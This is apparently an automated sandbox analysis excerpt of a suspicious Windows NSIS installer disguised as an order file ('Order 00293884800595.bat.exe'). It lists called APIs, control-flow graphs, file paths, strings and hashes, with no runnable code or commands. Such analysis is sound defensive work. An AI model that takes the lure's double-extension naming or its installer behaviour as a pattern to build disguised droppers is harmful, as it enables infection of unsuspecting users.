                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                                  • String ID: "$"C:\Users\user\Desktop\Order 00293884800595.bat.exe"$1033$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne$C:\Users\user\Desktop$C:\Users\user\Desktop\Order 00293884800595.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K@v$humpende Setup$~nsu%X.tmp
                                                  • API String ID: 2956269667-3936847705
                                                  • Opcode ID: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
                                                  • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                                  • Opcode Fuzzy Hash: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
                                                  • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 152 40550f-40552b 153 405531-4055f8 GetDlgItem * 3 call 404362 call 404c53 GetClientRect GetSystemMetrics SendMessageA * 2 152->153 154 4056ba-4056c0 152->154 176 405616-405619 153->176 177 4055fa-405614 SendMessageA * 2 153->177 156 4056c2-4056e4 GetDlgItem CreateThread FindCloseChangeNotification 154->156 157 4056ea-4056f6 154->157 156->157 159 405718-40571e 157->159 160 4056f8-4056fe 157->160 161 405720-405726 159->161 162 405773-405776 159->162 164 405700-405713 ShowWindow * 2 call 404362 160->164 165 405739-405740 call 404394 160->165 167 405728-405734 call 404306 161->167 168 40574c-40575c ShowWindow 161->168 162->165 171 405778-40577e 162->171 164->159 173 405745-405749 165->173 167->165 174 40576c-40576e call 404306 168->174 175 40575e-405767 call 4053d1 168->175 171->165 178 405780-405793 SendMessageA 171->178 174->162 175->174 179 405629-405640 call 40432d 176->179 180 40561b-405627 SendMessageA 176->180 177->176 181 405890-405892 178->181 182 405799-4057c5 CreatePopupMenu call 406320 AppendMenuA 178->182 191 405642-405656 ShowWindow 179->191 192 405676-405697 GetDlgItem SendMessageA 179->192 180->179 181->173 189 4057c7-4057d7 GetWindowRect 182->189 190 4057da-4057f0 TrackPopupMenu 182->190 189->190 190->181 193 4057f6-405810 190->193 194 405665 191->194 195 405658-405663 ShowWindow 191->195 192->181 196 40569d-4056b5 SendMessageA * 2 192->196 197 405815-405830 SendMessageA 193->197 198 40566b-405671 call 404362 194->198 195->198 196->181 197->197 199 405832-405852 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 197->199 198->192 201 405854-405874 SendMessageA 199->201 201->201 202 405876-40588a GlobalUnlock SetClipboardData CloseClipboard 201->202 202->181
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                                  • GetClientRect.USER32(?,?), ref: 004055BA
                                                  • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                                  • ShowWindow.USER32(?,00000008), ref: 0040565D
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                                    • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004056E4
                                                  • ShowWindow.USER32(00000000), ref: 00405707
                                                  • ShowWindow.USER32(?,00000008), ref: 0040570E
                                                  • ShowWindow.USER32(00000008), ref: 00405754
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                                  • CreatePopupMenu.USER32 ref: 00405799
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                                  • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                                  • OpenClipboard.USER32(00000000), ref: 00405833
                                                  • EmptyClipboard.USER32 ref: 00405839
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                                  • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                                  • CloseClipboard.USER32 ref: 0040588A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                  • String ID:
                                                  • API String ID: 4154960007-0
                                                  • Opcode ID: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                                  • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                                  • Opcode Fuzzy Hash: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                                  • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                                  APIs
                                                    • Part of subcall function 6CA512A5: GlobalAlloc.KERNEL32(00000040,6CA512C3,?,6CA5135F,-6CA5504B,6CA511C0,-000000A0), ref: 6CA512AD
                                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6CA51C54
                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 6CA51C9C
                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 6CA51CA6
                                                  • GlobalFree.KERNEL32(00000000), ref: 6CA51CB9
                                                  • GlobalFree.KERNEL32(?), ref: 6CA51D99
                                                  • GlobalFree.KERNEL32(?), ref: 6CA51D9E
                                                  • GlobalFree.KERNEL32(?), ref: 6CA51DA3
                                                  • GlobalFree.KERNEL32(00000000), ref: 6CA51F8A
                                                  • lstrcpyA.KERNEL32(?,?), ref: 6CA52128
                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 6CA521A4
                                                  • LoadLibraryA.KERNEL32(00000008), ref: 6CA521B5
                                                  • GetProcAddress.KERNEL32(?,?), ref: 6CA5220E
                                                  • lstrlenA.KERNEL32(00000408), ref: 6CA52228
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true
                                                  • Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: ca57531aab50ff558fc31a138f62b18f8996fe2b8f1a25dc6d5b11603cf7a9b0
                                                  • Instruction ID: 29a01d155cd712b1d27e842717ae14666467a239058c4b163a3c105648b17a66
                                                  • Opcode Fuzzy Hash: ca57531aab50ff558fc31a138f62b18f8996fe2b8f1a25dc6d5b11603cf7a9b0
                                                  • Instruction Fuzzy Hash: 5D229071E45206DEDB108FA8C4847FEBBF4FB05309FA4C62ED265A2A80D77499E5CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 737 405a4f-405a75 call 405d0d 740 405a77-405a89 DeleteFileA 737->740 741 405a8e-405a95 737->741 742 405c18-405c1c 740->742 743 405a97-405a99 741->743 744 405aa8-405ab8 call 40628d 741->744 745 405bc6-405bcb 743->745 746 405a9f-405aa2 743->746 752 405ac7-405ac8 call 405c66 744->752 753 405aba-405ac5 lstrcatA 744->753 745->742 748 405bcd-405bd0 745->748 746->744 746->745 750 405bd2-405bd8 748->750 751 405bda-405be2 call 406620 748->751 750->742 751->742 760 405be4-405bf8 call 405c1f call 405a07 751->760 755 405acd-405ad0 752->755 753->755 758 405ad2-405ad9 755->758 759 405adb-405ae1 lstrcatA 755->759 758->759 761 405ae6-405b04 lstrlenA FindFirstFileA 758->761 759->761 776 405c10-405c13 call 4053d1 760->776 777 405bfa-405bfd 760->777 763 405b0a-405b21 call 405c4a 761->763 764 405bbc-405bc0 761->764 770 405b23-405b27 763->770 771 405b2c-405b2f 763->771 764->745 767 405bc2 764->767 767->745 770->771 773 405b29 770->773 774 405b31-405b36 771->774 775 405b42-405b50 call 40628d 771->775 773->771 779 405b38-405b3a 774->779 780 405b9b-405bad FindNextFileA 774->780 787 405b52-405b5a 775->787 788 405b67-405b72 call 405a07 775->788 776->742 777->750 782 405bff-405c0e call 4053d1 call 406066 777->782 779->775 783 405b3c-405b40 779->783 780->763 785 405bb3-405bb6 FindClose 780->785 782->742 783->775 783->780 785->764 787->780 791 405b5c-405b65 call 405a4f 787->791 796 405b93-405b96 call 4053d1 788->796 797 405b74-405b77 788->797 791->780 796->780 799 405b79-405b89 call 4053d1 call 406066 797->799 800 405b8b-405b91 797->800 799->780 800->780
                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405A78
                                                  • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405AC0
                                                  • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405AE1
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405AE7
                                                  • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405AF8
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                                  • FindClose.KERNEL32(00000000), ref: 00405BB6
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5C
                                                  • \*.*, xrefs: 00405ABA
                                                  • "C:\Users\user\Desktop\Order 00293884800595.bat.exe", xrefs: 00405A58
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Order 00293884800595.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-3404254380
                                                  • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                                  • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                                  • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                                  • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(763F3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                                  • FindClose.KERNEL32(00000000), ref: 00406637
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsf55F0.tmp, xrefs: 00406620
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp
                                                  • API String ID: 2295610775-4121408785
                                                  • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                                  • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                                                  • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                                  • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 203 403e33-403e45 204 403e4b-403e51 203->204 205 403fac-403fbb 203->205 204->205 206 403e57-403e60 204->206 207 40400a-40401f 205->207 208 403fbd-404005 GetDlgItem * 2 call 40432d SetClassLongA call 40140b 205->208 211 403e62-403e6f SetWindowPos 206->211 212 403e75-403e7c 206->212 209 404021-404024 207->209 210 40405f-404064 call 404379 207->210 208->207 214 404026-404031 call 401389 209->214 215 404057-404059 209->215 222 404069-404084 210->222 211->212 217 403ec0-403ec6 212->217 218 403e7e-403e98 ShowWindow 212->218 214->215 239 404033-404052 SendMessageA 214->239 215->210 221 4042fa 215->221 225 403ec8-403eda DestroyWindow 217->225 226 403edf-403ee2 217->226 223 403f99-403fa7 call 404394 218->223 224 403e9e-403eb1 GetWindowLongA 218->224 228 4042fc-404303 221->228 235 404086-404088 call 40140b 222->235 236 40408d-404093 222->236 223->228 224->223 237 403eb7-403eba ShowWindow 224->237 229 4042d7-4042dd 225->229 231 403ee4-403ef0 SetWindowLongA 226->231 232 403ef5-403efb 226->232 229->221 242 4042df-4042e5 229->242 231->228 232->223 238 403f01-403f10 GetDlgItem 232->238 235->236 243 4042b8-4042d1 DestroyWindow EndDialog 236->243 244 404099-4040a4 236->244 237->217 245 403f12-403f29 SendMessageA IsWindowEnabled 238->245 246 403f2f-403f32 238->246 239->228 242->221 247 4042e7-4042f0 ShowWindow 242->247 243->229 244->243 248 4040aa-4040f7 call 406320 call 40432d * 3 GetDlgItem 244->248 245->221 245->246 250 403f34-403f35 246->250 251 403f37-403f3a 246->251 247->221 275 404101-40413d ShowWindow KiUserCallbackDispatcher call 40434f EnableWindow 248->275 276 4040f9-4040fe 248->276 253 403f65-403f6a call 404306 250->253 254 403f48-403f4d 251->254 255 403f3c-403f42 251->255 253->223 258 403f83-403f93 SendMessageA 254->258 260 403f4f-403f55 254->260 255->258 259 403f44-403f46 255->259 258->223 259->253 263 403f57-403f5d call 40140b 260->263 264 403f6c-403f75 call 40140b 260->264 273 403f63 263->273 264->223 272 403f77-403f81 264->272 272->273 273->253 279 404142 275->279 280 40413f-404140 275->280 276->275 281 404144-404172 GetSystemMenu EnableMenuItem SendMessageA 279->281 280->281 282 404174-404185 SendMessageA 281->282 283 404187 281->283 284 40418d-4041c7 call 404362 call 403e14 call 40628d lstrlenA call 406320 SetWindowTextA call 401389 282->284 283->284 284->222 295 4041cd-4041cf 284->295 295->222 296 4041d5-4041d9 295->296 297 4041f8-40420c DestroyWindow 296->297 298 4041db-4041e1 296->298 297->229 299 404212-40423f CreateDialogParamA 297->299 298->221 300 4041e7-4041ed 298->300 299->229 302 404245-40429c call 40432d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->302 300->222 301 4041f3 300->301 301->221 302->221 307 40429e-4042b1 ShowWindow call 404379 302->307 309 4042b6 307->309 309->229
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                                  • ShowWindow.USER32(?), ref: 00403E8F
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                                  • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                                  • DestroyWindow.USER32 ref: 00403ECE
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                                  • GetDlgItem.USER32(?,?), ref: 00403F06
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                                  • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                                  • ShowWindow.USER32(00000000,?), ref: 00404108
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                                                  • EnableWindow.USER32(?,?), ref: 00404135
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                                  • EnableMenuItem.USER32(00000000), ref: 00404152
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                                  • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                                  • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                                  • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID:
                                                  • API String ID: 121052019-0
                                                  • Opcode ID: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                                  • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                                  • Opcode Fuzzy Hash: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                                  • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 310 403a96-403aae call 4066b5 313 403ab0-403ac0 call 4061eb 310->313 314 403ac2-403af3 call 406174 310->314 322 403b16-403b3f call 403d5b call 405d0d 313->322 318 403af5-403b06 call 406174 314->318 319 403b0b-403b11 lstrcatA 314->319 318->319 319->322 328 403b45-403b4a 322->328 329 403bc6-403bce call 405d0d 322->329 328->329 330 403b4c-403b70 call 406174 328->330 335 403bd0-403bd7 call 406320 329->335 336 403bdc-403c01 LoadImageA 329->336 330->329 339 403b72-403b74 330->339 335->336 337 403c82-403c8a call 40140b 336->337 338 403c03-403c33 RegisterClassA 336->338 352 403c94-403c9f call 403d5b 337->352 353 403c8c-403c8f 337->353 341 403d51 338->341 342 403c39-403c7d SystemParametersInfoA CreateWindowExA 338->342 344 403b85-403b91 lstrlenA 339->344 345 403b76-403b83 call 405c4a 339->345 350 403d53-403d5a 341->350 342->337 346 403b93-403ba1 lstrcmpiA 344->346 347 403bb9-403bc1 call 405c1f call 40628d 344->347 345->344 346->347 351 403ba3-403bad GetFileAttributesA 346->351 347->329 356 403bb3-403bb4 call 405c66 351->356 357 403baf-403bb1 351->357 363 403ca5-403cbf ShowWindow call 406647 352->363 364 403d28-403d29 call 4054a3 352->364 353->350 356->347 357->347 357->356 371 403cc1-403cc6 call 406647 363->371 372 403ccb-403cdd GetClassInfoA 363->372 367 403d2e-403d30 364->367 369 403d32-403d38 367->369 370 403d4a-403d4c call 40140b 367->370 369->353 373 403d3e-403d45 call 40140b 369->373 370->341 371->372 376 403cf5-403d18 DialogBoxParamA call 40140b 372->376 377 403cdf-403cef GetClassInfoA RegisterClassA 372->377 373->353 380 403d1d-403d26 call 4039e6 376->380 377->376 380->350
                                                  APIs
                                                    • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                                    • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                                  • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,763F3410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",0000000A,0000000C), ref: 00403B11
                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,763F3410), ref: 00403B86
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                                  • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",0000000A,0000000C), ref: 00403BA4
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes), ref: 00403BED
                                                    • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                                  • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                                  • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",0000000A,0000000C), ref: 00403CAD
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                                  • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                                  • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
